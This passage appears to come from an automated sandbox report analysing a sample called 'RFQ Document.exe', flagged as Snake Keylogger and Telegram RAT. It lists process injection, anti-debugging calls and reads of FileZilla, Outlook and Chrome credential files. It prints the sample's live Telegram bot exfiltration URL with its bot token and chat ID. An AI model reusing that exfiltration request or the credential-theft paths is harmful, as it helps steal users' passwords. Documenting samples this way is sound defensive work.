                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpBinary or memory string: {"ok":true,"result":{"message_id":12828,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"document":{"file_name":"SnakePW.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIyHGFSr0k04FSKMz2uOWGp3zHXGj4OAALpDAACxkKRUr9jsMmoR-bZIQQ","file_unique_id":"AgAD6QwAAsZCkVI","file_size":195},"caption":"Pc Name: user | Snake Keylogger\n\nPW | user | Snake"}}
                  Source: RFQ Document.exe, 00000002.00000002.926716037.00000000024F7000.00000004.00000001.sdmpBinary or memory string: k":true,"result":{"message_id":12828,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"document":{"file_name":"SnakePW.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIyHGFSr0k04FSKMz2uOWGp3zHXGj4OAALpDAACxkKRUr9jsMmoR-bZIQQ","file_unique_id":"AgAD6QwAAsZCkVI","file_size":195},"caption":"Pc Name: user | Snake Keylogger\n\nPW | user | Snake"}}j
                  Source: RFQ Document.exe, 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_004067FE GetProcessHeap,
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_6FD8B472 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_6FD8B7B4 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_6FD8B776 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_6FD8B737 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_6FD8B686 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234C1D7 LdrInitializeThunk,
                  Source: C:\Users\user\Desktop\RFQ Document.exeMemory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_00401E1D SetUnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  .NET source code references suspicious native API functionsShow sources
                  Source: 2.2.RFQ Document.exe.4940000.5.unpack, ufffdufffd??ufffd/ufffdu0609ufffd?m.csReference to suspicious API methods: ('R????', 'MapVirtualKey@user32.dll')
                  Source: 2.2.RFQ Document.exe.4940000.5.unpack, ?????/ufffdud9d8udc81iu26ca.csReference to suspicious API methods: ('c?Z??', 'LoadLibrary@kernel32.dll'), ('i???;', 'GetProcAddress@kernel32')
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\Desktop\RFQ Document.exeMemory written: C:\Users\user\Desktop\RFQ Document.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess created: C:\Users\user\Desktop\RFQ Document.exe 'C:\Users\user\Desktop\RFQ Document.exe'
                  Source: RFQ Document.exe, 00000002.00000002.926341642.0000000000E10000.00000002.00020000.sdmpBinary or memory string: Program Manager
                  Source: RFQ Document.exe, 00000002.00000002.926341642.0000000000E10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: RFQ Document.exe, 00000002.00000002.926341642.0000000000E10000.00000002.00020000.sdmpBinary or memory string: Progman
                  Source: RFQ Document.exe, 00000002.00000002.926341642.0000000000E10000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\RFQ Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0040208D cpuid
                  Source: C:\Users\user\Desktop\RFQ Document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected Snake KeyloggerShow sources
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, type: MEMORY
                  Yara detected Telegram RATShow sources
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ Document.exe PID: 2628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RFQ Document.exe PID: 6484, type: MEMORYSTR
                  Tries to harvest and steal ftp login credentialsShow sources
                  Source: C:\Users\user\Desktop\RFQ Document.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\user\Desktop\RFQ Document.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\RFQ Document.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ Document.exe PID: 2628, type: MEMORYSTR

                  Remote Access Functionality:

                  barindex
                  Yara detected Snake KeyloggerShow sources
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, type: MEMORY
                  Yara detected Telegram RATShow sources
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ Document.exe PID: 2628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RFQ Document.exe PID: 6484, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsNative API1Path InterceptionProcess Injection112Disable or Modify Tools1OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                  Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationEncrypted Channel11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing31NTDSSecurity Software Discovery21Distributed Component Object ModelClipboard Data1Scheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  RFQ Document.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll100%Joe Sandbox ML

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  1.0.RFQ Document.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
                  2.1.RFQ Document.exe.400000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                  2.2.RFQ Document.exe.4940000.5.unpack100%AviraHEUR/AGEN.1106066Download File
                  2.2.RFQ Document.exe.400000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                  1.2.RFQ Document.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
                  2.0.RFQ Document.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://freegeoip.app/xml/0%URL Reputationsafe
                  https://api.telegram.orgD81lT80%Avira URL Cloudsafe
                  https://api.telegram.orgD81lL-0%Avira URL Cloudsafe
                  https://api.telegram.orgD81lda00%Avira URL Cloudsafe
                  http://schemas.m0%URL Reputationsafe
                  https://api.telegram.orgD81lLc0%Avira URL Cloudsafe
                  https://api.telegram.orgD81lD0%Avira URL Cloudsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  https://api.telegram.org41lX0%Avira URL Cloudsafe
                  https://api.telegram.orgD81l$U0%Avira URL Cloudsafe
                  https://api.telegram.orgD81l$T0%Avira URL Cloudsafe
                  https://api.telegram.orgD81ll0%Avira URL Cloudsafe
                  https://api.telegram.orgD81lT~0%Avira URL Cloudsafe
                  https://api.telegram.orgD81l40%Avira URL Cloudsafe
                  https://api.telegram.orgD81lt0%Avira URL Cloudsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  https://api.telegram.orgD81ldb0%Avira URL Cloudsafe
                  https://api.telegram.orgD81l(0%Avira URL Cloudsafe
                  https://api.telegram.orgD81lLH0%Avira URL Cloudsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  https://freegeoip.app/xml/84.17.52.390%Avira URL Cloudsafe
                  https://api.telegram0%Avira URL Cloudsafe
                  https://freegeoip.app41l0%Avira URL Cloudsafe
                  https://api.telegram.orgD81l0%Avira URL Cloudsafe
                  https://api.telegram.orgD81lDP0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  freegeoip.app
                  		172.67.188.154
                  		truefalse
                    		unknown
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		132.226.8.169
                      		truefalse
                        		unknown
                        clientconfig.passport.net
                        		unknown
                        		unknowntrue
                          		unknown
                          checkip.dyndns.org
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.telegram.org/bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snakefalse
                              		high
                              http://checkip.dyndns.org/false
                              • URL Reputation: safe
                              		unknown
                              https://freegeoip.app/xml/84.17.52.39false
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://freegeoip.app/xml/RFQ Document.exe, RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.orgD81lT8RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.telegram.orgD81lL-RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              https://api.telegram.orgD81lda0RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.mRFQ Document.exefalse
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.org/botRFQ Document.exe, RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmpfalse
                                		high
                                https://api.telegram.orgD81lLcRFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.telegram.orgD81lDRFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://checkip.dyndns.orgRFQ Document.exe, 00000002.00000002.926600469.0000000002461000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.telegram.org41lXRFQ Document.exe, 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.telegram.orgD81l$URFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
